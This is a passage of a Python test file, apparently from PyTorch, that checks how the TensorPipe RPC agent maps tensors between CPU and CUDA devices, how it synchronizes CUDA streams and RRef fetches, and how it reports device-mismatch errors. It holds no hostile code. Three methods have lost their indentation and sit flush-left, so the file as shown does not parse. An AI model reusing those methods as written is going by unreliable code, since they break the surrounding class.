        """cpu args mapped onto a non-default GPU (cuda:1)."""
        self._test_device_maps_gpu(
            x_from="cpu",
            y_from="cpu",
            z_to=1,
            device_map={"cpu" : 1},
            fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
        )
    @skip_if_lt_x_gpu(1)
    def test_device_map_gpu_to_cpu_default(self):
        """cuda:0 args mapped onto cpu remotely."""
        self._test_device_maps_gpu(
            x_from=0,
            y_from=0,
            z_to="cpu",
            device_map={0 : "cpu"},
            fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_to_cpu_non_default(self):
        """cuda:1 args mapped onto cpu remotely."""
        self._test_device_maps_gpu(
            x_from=1,
            y_from=1,
            z_to="cpu",
            device_map={1 : "cpu"},
            fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_default(self):
        """Identity map on the default GPU."""
        self._test_device_maps_gpu(
            x_from=0,
            y_from=0,
            z_to=0,
            device_map={0 : 0}
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_non_default(self):
        """Identity map on a non-default GPU."""
        self._test_device_maps_gpu(
            x_from=1,
            y_from=1,
            z_to=1,
            device_map={1 : 1}
        )
    # --- Exhaustive two-GPU permutations: identity map {0:0, 1:1} vs swapped
    # --- map {0:1, 1:0}, crossed with all (x_from, y_from, z_to) combinations.
    # --- The *_self_* variants target the calling worker itself (dst=self).
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_default_to_non_default(self):
        self._test_device_maps_gpu(
            x_from=0,
            y_from=0,
            z_to=1,
            device_map={0 : 1}
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_non_default_to_default(self):
        self._test_device_maps_gpu(
            x_from=1,
            y_from=1,
            z_to=0,
            device_map={1 : 0}
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_1(self):
        self._test_device_maps_gpu(
            x_from=0,
            y_from=1,
            z_to=0,
            device_map={0 : 0, 1 : 1}
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_2(self):
        self._test_device_maps_gpu(
            x_from=0,
            y_from=1,
            z_to=1,
            device_map={0 : 0, 1 : 1}
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_3(self):
        self._test_device_maps_gpu(
            x_from=1,
            y_from=0,
            z_to=0,
            device_map={0 : 0, 1 : 1}
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_4(self):
        self._test_device_maps_gpu(
            x_from=1,
            y_from=0,
            z_to=1,
            device_map={0 : 0, 1 : 1}
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_5(self):
        self._test_device_maps_gpu(
            x_from=0,
            y_from=1,
            z_to=0,
            device_map={0 : 1, 1 : 0}
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_6(self):
        self._test_device_maps_gpu(
            x_from=0,
            y_from=1,
            z_to=1,
            device_map={0 : 1, 1 : 0}
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_7(self):
        self._test_device_maps_gpu(
            x_from=1,
            y_from=0,
            z_to=0,
            device_map={0 : 1, 1 : 0}
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_8(self):
        self._test_device_maps_gpu(
            x_from=1,
            y_from=0,
            z_to=1,
            device_map={0 : 1, 1 : 0}
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_self_1(self):
        self._test_device_maps_gpu(
            x_from=0,
            y_from=1,
            z_to=0,
            device_map={0 : 0, 1 : 1},
            dst=worker_name(self.rank)
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_self_2(self):
        self._test_device_maps_gpu(
            x_from=0,
            y_from=1,
            z_to=1,
            device_map={0 : 0, 1 : 1},
            dst=worker_name(self.rank)
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_self_3(self):
        self._test_device_maps_gpu(
            x_from=1,
            y_from=0,
            z_to=0,
            device_map={0 : 0, 1 : 1},
            dst=worker_name(self.rank)
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_self_4(self):
        self._test_device_maps_gpu(
            x_from=1,
            y_from=0,
            z_to=1,
            device_map={0 : 0, 1 : 1},
            dst=worker_name(self.rank)
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_self_5(self):
        self._test_device_maps_gpu(
            x_from=0,
            y_from=1,
            z_to=0,
            device_map={0 : 1, 1 : 0},
            dst=worker_name(self.rank)
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_self_6(self):
        self._test_device_maps_gpu(
            x_from=0,
            y_from=1,
            z_to=1,
            device_map={0 : 1, 1 : 0},
            dst=worker_name(self.rank)
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_self_7(self):
        self._test_device_maps_gpu(
            x_from=1,
            y_from=0,
            z_to=0,
            device_map={0 : 1, 1 : 0},
            dst=worker_name(self.rank)
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_gpu_mixed_self_8(self):
        self._test_device_maps_gpu(
            x_from=1,
            y_from=0,
            z_to=1,
            device_map={0 : 1, 1 : 0},
            dst=worker_name(self.rank)
        )
    @staticmethod
    def _gpu_add_multi_gpu(x, y):
        """Expect x on cuda:1 and y on cuda:0; return (sum on cuda:0, diff on cuda:1)."""
        if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 0]):
            return x.to(0) + y, x - y.to(1)
        else:
            raise ValueError("Wrong device affinity")
    def _test_device_maps_multi_gpu(self, dst):
        """Cross-map {0: 1, 1: 0} to *dst* and verify both returned tensors
        come back on the reverse-mapped devices with the right values."""
        options = self.rpc_backend_options
        # Two one-entry calls accumulate into the combined map {0: 1, 1: 0}.
        options.set_device_map(dst, {0: 1})
        options.set_device_map(dst, {1: 0})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        x = torch.zeros(2).to(0)
        y = torch.ones(2).to(1)
        rets = rpc.rpc_sync(
            dst,
            TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
            args=(x, y)
        )
        # Remote devices 0/1 map back to local 1/0 respectively.
        self.assertEqual(rets[0].device, torch.device(1))
        self.assertEqual(rets[1].device, torch.device(0))
        self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
        self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
        rpc.shutdown()
    @skip_if_lt_x_gpu(2)
    def test_device_maps_multi_gpu(self):
        """Multi-GPU cross map against the next worker."""
        dst = worker_name((self.rank + 1) % self.world_size)
        self._test_device_maps_multi_gpu(dst)
    @skip_if_lt_x_gpu(2)
    def test_device_maps_multi_gpu_self(self):
        """Multi-GPU cross map against the calling worker itself."""
        dst = worker_name(self.rank)
        self._test_device_maps_multi_gpu(dst)
    @staticmethod
    def _gpu_add_return_to_gpu(x, y):
        """Expect both args on CPU; return four results spread over cuda:0..3."""
        if x.device.type == 'cpu' and y.device.type == 'cpu':
            return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
        else:
            raise ValueError("Wrong device affinity")
    @skip_if_lt_x_gpu(2)
    def test_device_maps_in_options(self):
        """Device maps passed via the TensorPipeRpcBackendOptions constructor
        (device_maps kwarg) must behave the same as set_device_map calls."""
        dst = worker_name((self.rank + 1) % self.world_size)
        options = self.rpc_backend_options
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            # Rebuild options from scratch so the map only comes from the ctor.
            rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
                init_method=options.init_method,
                num_worker_threads=options.num_worker_threads,
                device_maps={dst: {0: 1, 1: 0}}
            )
        )
        rets = rpc.rpc_sync(
            dst,
            TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
            args=(torch.zeros(2).to(0), torch.ones(2).to(1))
        )
        self.assertEqual(rets[0].device, torch.device(1))
        self.assertEqual(rets[1].device, torch.device(0))
        self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
        self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
        rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
    @skip_if_lt_x_gpu(4)
    def test_device_maps_return_to_gpu(self):
        """Rotated 4-GPU map against the next worker."""
        dst = worker_name((self.rank + 1) % self.world_size)
        self._test_device_maps_return_to_gpu(dst)
    @skip_if_lt_x_gpu(4)
    def test_device_maps_return_to_gpu_self(self):
        """Rotated 4-GPU map against the calling worker itself."""
        dst = worker_name(self.rank)
        self._test_device_maps_return_to_gpu(dst)
    @staticmethod
    def _add_to_gpu(x, y):
        """Add and move the result to cuda:0 (used to trigger response-mapping paths)."""
        return (x + y).to(0)
    def _test_device_maps_missing_config(self, mode):
        """Sending a CUDA tensor with no device map configured must raise,
        and the agent must remain usable afterwards."""
        dst = worker_name((self.rank + 1) % self.world_size)
        errMsg = (
            "TensorPipe RPC backend only supports CPU tensors by default.*"
            "`set_device_map` on `TensorPipeRpcBackendOptions`"
        )
        with self.assertRaisesRegex(RuntimeError, errMsg):
            if mode == RPCExecMode.SYNC:
                rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
            elif mode == RPCExecMode.REMOTE:
                rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
            else:
                raise ValueError(f"unexpected mode {mode}")
        # make sure RPC is still functioning
        ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
        self.assertEqual(ret, torch.ones(2) + 1)
    def _test_device_maps_missing_config_response(self, mode):
        """A remote fn returning a CUDA tensor with no response mapping must raise,
        and the agent must remain usable afterwards."""
        dst = worker_name((self.rank + 1) % self.world_size)
        errMsg = "Response device mapping is not available"
        with self.assertRaisesRegex(RuntimeError, errMsg):
            if mode == RPCExecMode.SYNC:
                rpc.rpc_sync(
                    dst,
                    TensorPipeAgentCudaRpcTest._add_to_gpu,
                    args=(torch.zeros(2), 1)
                )
            elif mode == RPCExecMode.REMOTE:
                rpc.remote(
                    dst,
                    TensorPipeAgentCudaRpcTest._add_to_gpu,
                    args=(torch.zeros(2), 1)
                ).to_here()
            else:
                raise ValueError(f"unexpected mode {mode}")
        # make sure RPC is still functioning
        ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
        self.assertEqual(ret, torch.ones(2) + 1)
    @skip_if_lt_x_gpu(1)
    @dist_init
    def test_device_maps_missing_config(self):
        """Missing request device map, synchronous mode."""
        self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
    # --- Missing-config scenarios across exec modes and repeated invocations
    # --- (the loop variants exceed the worker-thread count to catch leaks).
    @skip_if_lt_x_gpu(1)
    @dist_init
    def test_device_maps_missing_config_loop(self):
        """Repeat the sync missing-config failure more times than worker threads."""
        for _ in range(self.rpc_backend_options.num_worker_threads + 5):
            self._test_device_maps_missing_config(RPCExecMode.SYNC)
    @skip_if_lt_x_gpu(1)
    @dist_init
    def test_device_maps_missing_config_response(self):
        """Missing response device map, synchronous mode."""
        self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
    @skip_if_lt_x_gpu(1)
    @dist_init
    def test_device_maps_missing_config_response_loop(self):
        """Repeat the response-map failure more times than worker threads."""
        for _ in range(self.rpc_backend_options.num_worker_threads + 5):
            self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
    @skip_if_lt_x_gpu(1)
    @dist_init
    def test_device_maps_missing_config_remote(self):
        """Missing request device map, remote (RRef) mode."""
        self._test_device_maps_missing_config(RPCExecMode.REMOTE)
    @skip_if_lt_x_gpu(1)
    @dist_init
    def test_device_maps_missing_config_remote_response(self):
        """Missing response device map, remote (RRef) mode."""
        self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
    @skip_if_lt_x_gpu(2)
    def test_device_maps_remote(self):
        """remote() + to_here() honors the device map: remote cuda:0 result
        comes back on local cuda:1 via the {1: 0} mapping."""
        options = self.rpc_backend_options
        dst = worker_name((self.rank + 1) % self.world_size)
        options.set_device_map(dst, {1: 0})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        rref = rpc.remote(
            dst,
            TensorPipeAgentCudaRpcTest._add_to_gpu,
            args=(torch.zeros(2), 1)
        )
        self.assertEqual(rref.to_here().device.index, 1)
        self.assertEqual(rref.to_here(), torch.ones(2).to(1))
        rpc.shutdown()
    @staticmethod
    def _slow_add_on_user_stream(x, y):
        """Add x and y on a fresh side stream after an artificial GPU delay.

        Runs the add on a new stream (s1) that waits on the current stream (s0),
        sleeps ~10 * FIFTY_MIL_CYCLES on the GPU first, then hands the result
        back to s0. record_stream calls keep x, y and z alive across streams.
        Exercises cross-stream synchronization in RPC serialization.
        """
        s0 = torch.cuda.current_stream(x.device)
        s1 = torch.cuda.Stream(device=x.device)
        s1.wait_stream(s0)
        x.record_stream(s1)
        y.record_stream(s1)
        with torch.cuda.stream(s1):
            torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
            z = x + y
        s0.wait_stream(s1)
        z.record_stream(s0)
        return z
    def _test_custom_stream(self, fn, device_map):
        """Init RPC with *device_map* toward the next worker, run *fn*(dst), shut down."""
        options = self.rpc_backend_options
        dst = worker_name((self.rank + 1) % self.world_size)
        options.set_device_map(dst, device_map)
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        fn(dst)
        rpc.shutdown()
    def _test_stream_sync(self, dst):
        """Single sync RPC to the slow user-stream add; result must equal 2 * x."""
        x = torch.ones(2, 2).to(0)
        ret = rpc.rpc_sync(
            dst,
            TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
            args=(x, x)
        )
        self.assertEqual(ret, 2 * x)
    @skip_if_lt_x_gpu(2)
    def test_custom_stream(self):
        """Sync variant with a cuda:0 -> cuda:1 map."""
        self._test_custom_stream(self._test_stream_sync, {"cuda:0": "cuda:1"})
    def _test_stream_multi_async(self, dst):
        """Fire 20 async slow-adds concurrently, then verify each result (2 * i * ones)."""
        futs = []
        for i in range(20):
            x = torch.ones(2, 2).to(0) * i
            futs.append(
                rpc.rpc_async(
                    dst,
                    TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
                    args=(x, x)
                )
            )
        for i in range(20):
            self.assertEqual(futs[i].wait(), 2 * torch.ones(2, 2).to(0) * i)
    @skip_if_lt_x_gpu(2)
    def test_custom_stream_multi(self):
        """Concurrent async variant with a cuda:0 -> cuda:1 map."""
        self._test_custom_stream(
            self._test_stream_multi_async,
            {"cuda:0": "cuda:1"}
        )
    @staticmethod
    def _nested_slow_add_on_user_stream(dst, x, y, z):
        """Add x + y via a nested RPC to *dst*, then add z locally on a user stream."""
        ret = rpc.rpc_sync(
            dst,
            TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
            args=(x, y)
        )
        return TensorPipeAgentCudaRpcTest._slow_add_on_user_stream(ret, z)
    def _test_stream_nested_sync(self, dst):
        """One nested sync call: x + y computed two hops away, + z one hop away.

        Expected total is x + 2x + 3x = 6 * x.
        """
        x = torch.ones(2, 2).to(0)
        y = torch.ones(2, 2).to(0) * 2
        z = torch.ones(2, 2).to(0) * 3
        nested_dst = worker_name((self.rank + 2) % self.world_size)
        ret = rpc.rpc_sync(
            dst,
            TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
            args=(nested_dst, x, y, z)
        )
        self.assertEqual(ret, 6 * x)
    @skip_if_lt_x_gpu(2)
    def test_custom_stream_nested(self):
        """Nested sync variant with a symmetric cuda:0 <-> cuda:1 map."""
        self._test_custom_stream(
            self._test_stream_nested_sync,
            {"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
        )
    def _test_stream_nested_multi_async(self, dst):
        """Rank 0 fires 5 concurrent nested slow-adds and checks xs[i]+ys[i]+zs[i]."""
        if self.rank == 0:
            futs = []
            n = 5
            xs, ys, zs = [], [], []
            for i in range(n):
                x = torch.ones(2, 2).to(0) * (i - 1)
                y = torch.ones(2, 2).to(0) * i
                z = torch.ones(2, 2).to(0) * (i + 1)
                xs.append(x)
                ys.append(y)
                zs.append(z)
                nested_dst = worker_name((self.rank + 2) % self.world_size)
                futs.append(
                    rpc.rpc_async(
                        dst,
                        TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
                        args=(nested_dst, x, y, z)
                    )
                )
            for i in range(n):
                self.assertEqual(futs[i].wait(), xs[i] + ys[i] + zs[i])
    @skip_if_lt_x_gpu(2)
    def test_custom_stream_nested_multi(self):
        """Concurrent nested variant with a symmetric cuda:0 <-> cuda:1 map."""
        self._test_custom_stream(
            self._test_stream_nested_multi_async,
            {"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
        )
    @staticmethod
    def _gpu_add_wrong_gpus(x, y):
        """Deliberately mix CPU and CUDA operands to provoke a device-mismatch error."""
        if x.is_cuda and y.is_cuda:
            return x.cpu() + y.cuda()
        else:
            raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(1)
def test_device_mismatch(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(0)
with self.assertRaisesRegex(
RuntimeError,
"Expected all tensors to be on the same device, but found at least two devices"
):
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_wrong_gpus,
args=(x, y)
)
rpc.shutdown()
    def _test_rref_synchronization(self, local_device, remote_device):
        """Compare rref.remote().forward(x).to_here() against rref.rpc_sync().forward(x).

        If to_here() is properly synchronized with forward's CUDA work the two
        must be identical on every iteration.
        """
        dst = worker_name((self.rank + 1) % self.world_size)
        options = self.rpc_backend_options
        options.set_device_map(dst, {local_device : remote_device})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        if self.rank == 1:
            # This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
            # If to_here() is properly synchronized with forward(x) the results must be identical
            # This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN of MNIST-like data.
            # see https://github.com/pytorch/pytorch/issues/54771
            rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
            for _ in range(10):
                x = torch.randn(200, 1, 28, 28).to(local_device)
                actual = rref.remote().forward(x).to_here()
                expected = rref.rpc_sync().forward(x)
                self.assertEqual(actual, expected)
        rpc.shutdown()
    # All four local/remote device combinations over cuda:0 and cuda:1.
    @skip_if_lt_x_gpu(1)
    def test_rref_to_here_synchronization1(self):
        self._test_rref_synchronization("cuda:0", "cuda:0")
    @skip_if_lt_x_gpu(2)
    def test_rref_to_here_synchronization2(self):
        self._test_rref_synchronization("cuda:1", "cuda:0")
    @skip_if_lt_x_gpu(2)
    def test_rref_to_here_synchronization3(self):
        self._test_rref_synchronization("cuda:1", "cuda:1")
    @skip_if_lt_x_gpu(2)
    def test_rref_to_here_synchronization4(self):
        self._test_rref_synchronization("cuda:0", "cuda:1")
    def _test_rref_as_arg_synchronization(
        self,
        local_device,
        remote_device,
        devicesOptions=None
    ):
        """Like _test_rref_synchronization, but the input is wrapped in an RRef.

        Configures maps in both directions (toward dst for requests and from
        the previous worker for RRef fetches); devicesOptions, when given, is
        a per-rank list passed to options.set_devices.
        """
        dst = worker_name((self.rank + 1) % self.world_size)
        options = self.rpc_backend_options
        options.set_device_map(dst, {local_device: remote_device})
        input_src = worker_name((self.rank - 1 + self.world_size) % self.world_size)
        options.set_device_map(input_src, {remote_device: local_device})
        if devicesOptions is not None:
            options.set_devices(devicesOptions[self.rank])
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        if self.rank == 1:
            # This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
            # If to_here() is properly synchronized with forward(x) the results must be identical
            # This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN of MNIST-like data.
            # see https://github.com/pytorch/pytorch/issues/54771
            rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
            for _ in range(10):
                rref_x = RRef(torch.randn(200, 1, 28, 28).to(local_device))
                actual = rref.remote().forward(rref_x, True).to_here()
                expected = rref.rpc_sync().forward(rref_x, True)
                self.assertEqual(actual, expected)
        rpc.shutdown()
    # Device combinations, plus one run with an explicit per-rank devices list.
    @skip_if_lt_x_gpu(1)
    def test_rref_as_arg_synchronization1(self):
        self._test_rref_as_arg_synchronization("cuda:0", "cuda:0")
    @skip_if_lt_x_gpu(2)
    def test_rref_as_arg_synchronization2(self):
        self._test_rref_as_arg_synchronization("cuda:1", "cuda:0")
    @skip_if_lt_x_gpu(2)
    def test_rref_as_arg_synchronization3(self):
        self._test_rref_as_arg_synchronization("cuda:1", "cuda:1")
    @skip_if_lt_x_gpu(2)
    def test_rref_as_arg_synchronization4(self):
        self._test_rref_as_arg_synchronization("cuda:0", "cuda:1")
    @skip_if_lt_x_gpu(1)
    def test_rref_as_arg_synchronization5(self):
        self._test_rref_as_arg_synchronization(
            "cuda:0",
            "cuda:0",
            [["cuda:0"] for _ in range(4)],  # devicesOptions
        )
    @staticmethod
    def _rref_relay(rref):
        """Fetch an RRef's value on a relay worker (forces a cross-worker copy)."""
        return rref.to_here()
    def _test_rref_forward_synchronization(self, local_device, remote_device):
        """Route the forward output through a relay worker and verify the value
        still matches a direct rpc_sync forward (stream-sync through an extra hop)."""
        options = self.rpc_backend_options
        input_src = worker_name(0)
        model_dst = worker_name(1)
        out_relay = worker_name(2)
        if self.rank == 0:
            # for 1) model construction 2) forward execution
            options.set_device_map(model_dst, {local_device: remote_device})
            # Forward output will be first copied to the relay node before
            # returning to the worker. This is intentional, to test RRef
            # forward CUDA stream synchronizations.
            options.set_device_map(out_relay, {local_device: local_device})
        elif self.rank == 1:
            # worker1 hosts the model and runs forward. The forward functions
            # calls RRef.to_here(), hence needs to configure the device map
            options.set_device_map(input_src, {remote_device: local_device})
        elif self.rank == 2:
            # worker2 will get the out RRef and call to_here() and hence, needs
            # to configure device map.
            options.set_device_map(model_dst, {local_device: remote_device})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        if self.rank == 0:
            # This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
            # If to_here() is properly synchronized with forward(x) the results must be identical
            # This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN of MNIST-like data.
            # see https://github.com/pytorch/pytorch/issues/54771
            rref = rpc.remote(model_dst, MyConvNetForMNIST, args=(remote_device,))
            for _ in range(10):
                rref_input = RRef(torch.randn(200, 1, 28, 28).to(local_device))
                rref_out = rref.remote().forward(rref_input, True)
                out = rpc.remote(
                    out_relay,
                    TensorPipeAgentCudaRpcTest._rref_relay,
                    args=(rref_out,)
                ).to_here()
                expected = rref.rpc_sync().forward(rref_input, True)
                self.assertEqual(out, expected)
        rpc.shutdown()
    # All four local/remote device combinations over cuda:0 and cuda:1.
    @skip_if_lt_x_gpu(1)
    def test_rref_forward_synchronization1(self):
        self._test_rref_forward_synchronization("cuda:0", "cuda:0")
    @skip_if_lt_x_gpu(2)
    def test_rref_forward_synchronization2(self):
        self._test_rref_forward_synchronization("cuda:0", "cuda:1")
    @skip_if_lt_x_gpu(2)
    def test_rref_forward_synchronization3(self):
        self._test_rref_forward_synchronization("cuda:1", "cuda:0")
    @skip_if_lt_x_gpu(2)
    def test_rref_forward_synchronization4(self):
        self._test_rref_forward_synchronization("cuda:1", "cuda:1")
    def _test_owner_rref_forward_synchronization(self, local_device, remote_device):
        """Single-worker (world_size=1) check that an owner RRef's localValue
        path is synchronized with the forward that produced it."""
        if self.rank == 0:
            options = self.rpc_backend_options
            options.set_device_map("w0", {local_device: remote_device})
            rpc.init_rpc(
                "w0",
                rank=0,
                world_size=1,
                rpc_backend_options=options
            )
            model = rpc.remote(
                "w0", torch.nn.Linear, (2048, 20000)
            ).remote().to(remote_device)
            for _ in range(30):
                data = torch.rand(2048, 2048).to(local_device)
                output = model.rpc_sync().forward(data)
                # to_here() internally calls localValue as the caller is
                # the owner of the RRef.
                v0 = rpc.RRef(output).remote().sum().to_here().item()
                v1 = output.sum().item()
                self.assertEqual(v0, v1)
            rpc.shutdown()
    # All four local/remote device combinations over cuda:0 and cuda:1.
    @skip_if_lt_x_gpu(1)
    def test_owner_rref_forward_synchronization1(self):
        self._test_owner_rref_forward_synchronization("cuda:0", "cuda:0")
    @skip_if_lt_x_gpu(2)
    def test_owner_rref_forward_synchronization2(self):
        self._test_owner_rref_forward_synchronization("cuda:0", "cuda:1")
    @skip_if_lt_x_gpu(2)
    def test_owner_rref_forward_synchronization3(self):
        self._test_owner_rref_forward_synchronization("cuda:1", "cuda:0")
    @skip_if_lt_x_gpu(2)
    def test_owner_rref_forward_synchronization4(self):
        self._test_owner_rref_forward_synchronization("cuda:1", "cuda:1")
    @staticmethod
    def _return_tensor_view(i):
        """Return a view (split) of a freshly computed CUDA tensor after a GPU delay."""
        x = torch.ones(1000, 200).cuda(0) * i
        torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
        # serialization of the return value will create a new tensor from the
        # view, which is done outside of the user function.
        return x.split(100)[0]
    @skip_if_lt_x_gpu(1)
    def test_tensor_view_as_return_value(self):
        """Returned tensor views must be materialized with proper stream sync."""
        dst = worker_name((self.rank + 1) % self.world_size)
        options = self.rpc_backend_options
        options.set_device_map(dst, {0 : 0})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        futs = []
        for i in range(5):
            futs.append(rpc.rpc_async(
                dst,
                TensorPipeAgentCudaRpcTest._return_tensor_view,
                args=(i,)
            ))
        for i in range(5):
            self.assertEqual(torch.ones(100, 200) * i, futs[i].wait())
        rpc.shutdown()
    @skip_if_lt_x_gpu(2)
    def test_devices_option_mismatch(self):
        """A device map whose source device is not in set_devices must be rejected."""
        with self.assertRaisesRegex(
            ValueError,
            "Node worker0 has unexpected source devices in its device map for worker1"
        ):
            dst = worker_name((self.rank + 1) % self.world_size)
            options = self.rpc_backend_options
            options.set_device_map(dst, {0 : 0})
            # devices=[1] excludes device 0 used by the map above.
            options.set_devices([1])
            rpc.init_rpc(
                name=worker_name(self.rank),
                backend=self.rpc_backend,
                rank=self.rank,
                world_size=self.world_size,
                rpc_backend_options=options,
            )
            rpc.shutdown()
    @skip_if_lt_x_gpu(2)
    def test_devices_option_mismatch_reverse(self):
        """A peer's map targeting a device outside our devices list must be rejected."""
        with self.assertRaisesRegex(
            ValueError,
            "Node worker0 has unexpected target devices in its device map for worker1"
        ):
            dst = worker_name((self.rank + 1) % self.world_size)
            # Map targets device 1 while devices=[0] only advertises device 0.
            options = rpc.TensorPipeRpcBackendOptions(
                init_method=self.rpc_backend_options.init_method,
                num_worker_threads=self.rpc_backend_options.num_worker_threads,
                device_maps={dst: {0 : 1}},
                devices=[0]
            )
            rpc.init_rpc(
                name=worker_name(self.rank),
                backend=self.rpc_backend,
                rank=self.rank,
                world_size=self.world_size,
                rpc_backend_options=options,
            )
            rpc.shutdown()
    # --- Future(devices=...) constructor accepts int / str / torch.device
    # --- forms; the constructed future is intentionally unused.
    @skip_if_lt_x_gpu(1)
    def test_cuda_future_device_as_int(self):
        """Device given as a bare CUDA index."""
        fut = Future(devices=[0])
    @skip_if_lt_x_gpu(1)
    def test_cuda_future_device_as_str(self):
        """Device given as a "cuda:N" string."""
        fut = Future(devices=["cuda:0"])
    @skip_if_lt_x_gpu(1)
    def test_cuda_future_device_as_device(self):
        """Device given as a torch.device object."""
        fut = Future(devices=[torch.device("cuda", 0)])
